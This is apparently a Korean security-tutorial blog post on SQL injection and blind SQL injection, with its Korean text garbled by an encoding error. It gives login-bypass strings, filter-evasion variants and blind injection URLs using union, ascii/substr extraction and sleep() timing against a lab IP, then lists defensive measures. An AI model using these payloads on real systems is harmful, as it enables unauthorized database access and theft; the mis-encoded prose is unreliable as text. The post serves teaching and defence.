ÃֽŠ°Ô½Ã±Û(WEB)
HOME > WEB > ÃֽŠ°Ô½Ã±Û(WEB)
2018.11.06 / 10:10

[WEB Ãë¾àÁ¡ SQL Injection] ÇÊÅ͸µ ¿ìȸ + Blind SQL Injection

hanulbit
Ãßõ ¼ö 196

SQL INJECTION

[Á¤ÀÇ]

SQL ÀÎÁ§¼Ç (SQL »ðÀÔ, SQL ÁÖÀÔÀ¸·Îµµ ºÒ¸°´Ù) Àº ÄÚµå ÀÎÁ§¼ÇÀÇ ÇÑ ±â¹ýÀ¸·Î Ŭ¶óÀ̾ðÆ®ÀÇ ÀԷ°ªÀ» Á¶ÀÛÇÏ¿© ¼­¹öÀÇ µ¥ÀÌÅͺ£À̽º¸¦ °ø°ÝÇÒ ¼ö ÀÖ´Â °ø°Ý¹æ½ÄÀ» ¸»ÇÑ´Ù. ÁÖ·Î »ç¿ëÀÚ°¡ ÀÔ·ÂÇÑ µ¥ÀÌÅ͸¦ Á¦´ë·Î ÇÊÅ͸µ, À̽ºÄÉÀÌÇÎÇÏÁö ¸øÇßÀ» °æ¿ì¿¡ ¹ß»ýÇÑ´Ù. °ø°ÝÀÌ ½¬¿îµ¥ ºñÇØ Æı«·ÂÀÌ ¾î¸¶¾î¸¶ Çϱ⠶§¹®¿¡ ½ÃÅ¥¾îÄÚµùÀ» ÇÏ´Â °³¹ßÀÚ¶ó¸é °¡Àå ¸ÕÀú ¹è¿ì°Ô µÇ´Â ³»¿ëÀÌ´Ù. ÀÌ·¯ÇÑ injection °è¿­ÀÇ Ãë¾àÁ¡µéÀº Å×½ºÆ®¸¦ ÅëÇØ ¹ß°ßÇϱâ´Â ÈûµéÁö¸¸ ½ºÄ³´×ÅøÀ̳ª ÄÚµå °ËÁõÀýÂ÷¸¦ °ÅÄ¡¸é º¸Åë ½±°Ô ¹ß°ßµÇ±â ¶§¹®¿¡ ŽÁöÇϱâ´Â ½¬¿î ÆíÀÌ´Ù.

reference : ³ª¹«À§Å°


[Á¾·ù]

  • sql injection
  • blind sql injection
  • union injection    ; blind sql injection ¿¡ °°ÀÌ ¾²ÀÓ

[¿¹Á¦]

# ÀϹÝÀûÀÎ sql injection

- query Ư¼ºÀ» ÀÌ¿ëÇÏ¿© ÂüÀÌ µÇ°Ô ¸¸µç´Ù.

Á¤»óÀû sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";

Á¶ÀÛÇÑ sql query : SELECT * from tables where id="admin" and password="" or "1=1";

 ID

admin

 PW

" or "1=1


[ÇÊÅ͸µ ¿ìȸ ¿¹Á¦]

# °ø¹éÀÌ ÇÊÅ͸µ µÆÀ» ¶§

- %0a, /**/, %09, () ( URL¿¡¼­´Â %20 )

Á¤»óÀû sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";

Á¶ÀÛÇÑ sql query : SELECT * from tables where id="admin" and password=""%0aor%0a"1=1";

 ID

admin

 PW

"%0aor%0a"1=1


# =, and, or ÇÊÅ͸µ µÆÀ» ¶§

- °¢°¢ like, &&, ||

Á¤»óÀû sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";

Á¶ÀÛÇÑ sql query : SELECT * from tables where id="admin" and password="" ||  "1 like 1";

 ID

admin

 PW

" || "1 like 1





BLIND SQL INJECTION

[Á¤ÀÇ]

º¸ÀÌÁö ¾Ê´Â(blind) sql injection. ¿¡·¯ ±â¹ÝÀÇ sql injectionÀ» ¸·¾ÒÀ»¶§ DBÁ¤º¸°¡ ¸ðµÎ ºí¶óÀεå ó¸® µÇ±â ¶§¹®¿¡ Äõ¸®¸¦ ÀÔ·ÂÇÏ¿© ¼­¹ö¿¡¼­ ¾òÀ» ¼ö ÀÖ´Â °ÍÀº Âü°ú °ÅÁþ »ÓÀÌ´Ù. ÀÌ Âü°ú °ÅÁþÀ» ÀÌ¿ëÇÏ¿© DB ³»ºÎÀÇ Á¤º¸¸¦ ¾Ë¾Æ³»´Â °ø°Ý ±â¹ý


[¿¹Á¦]

Ä÷³ÀÇ °¹¼ö¸¦ ¾Ë°í ½ÍÀ» ¶§

sql query : select * from news where no=1 order by 1;

 URL

http://100.100.100.129/view.php?no=1 union select * from news where no=1 order by 1


Å×À̺í À̸§À» ¾Ë°í ½ÍÀ» ¶§

- ¾Æ½ºÅ°Äڵ带 ÀÌ¿ëÇؼ­ ÇѱÛÀÚ¾¿ Âü°ú °ÅÁþÀ» ÀÌ¿ëÇؼ­ ¾Ë¾Æ³½´Ù.

sql query : select ascii( substr( (select table_name from tables limit 0,1), 1, 1 ) )=67;

 URL

http://100.100.100.129/view.php?no=1 union select ascii( substr( (select table_name from tables limit 0,1), 1, 1 ) )=67;


Âü°ú °ÅÁþ °á°ú¸¦ ¾Ë ¼ö ¾øÀ» ¶§

- and ¿Í sleep ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© ÇÔ¼ö°¡ ÀÛµ¿Çϸé Äõ¸®°¡ ÀÛµ¿ÇÑ °ÍÀ¸·Î °£ÁÖÇÑ´Ù.

sql query : select * from news where no=1 order by 1;

 URL

http://100.100.100.129/view.php?no=1 union select * from news where no=1 order by 1 and sleep(10)


SQL INJECTION ¹æ¾î ¹æ¹ý

  • sql query ¿¡ »ç¿ëµÇ´Â ¹®ÀÚ ¹× ´Ü¾îµéÀ» ÀüºÎ ÇÊÅ͸µ ÇÑ´Ù.
  • ¿¡·¯ ¸Þ¼¼Áö, ƯÈ÷ query ¹®±¸°¡ ³ª¿ÀÁö ¾Êµµ·Ï °¢º°È÷ ÁÖÀÇ ÇÑ´Ù.
  • ÃÖ¼Ò ±ÇÇÑ À¯Àú·Î DB¸¦ ¿î¿µ ÇÑ´Ù.
  • ½Å·ÚÇÒ ¼ö ÀÖ´Â ³×Æ®¿öÅ©, ¼­¹ö¿¡ ´ëÇؼ­¸¸ Á¢±Ù Çã¿ëÇÑ´Ù.

¡Ø ¿¬½À ȯ°æÀÌ Á¦°øµÈ ÀϺΠ»çÀÌÆ®¸¦ Á¦¿ÜÇÑ ÀÏ¹Ý »çÀÌÆ®¿¡ Àû¿ë ¹× ¾Ç¿ë Àý´ë ±ÝÁö!

¡Ø ¹«ºÐº°ÇÑ Àû¿ë ¹× ¾Ç¿ëÀ¸·Î ÀÎÇÑ ÇÇÇØ´Â Àý´ë·Î Ã¥ÀÓÁöÁö ¾Ê½À´Ï´Ù.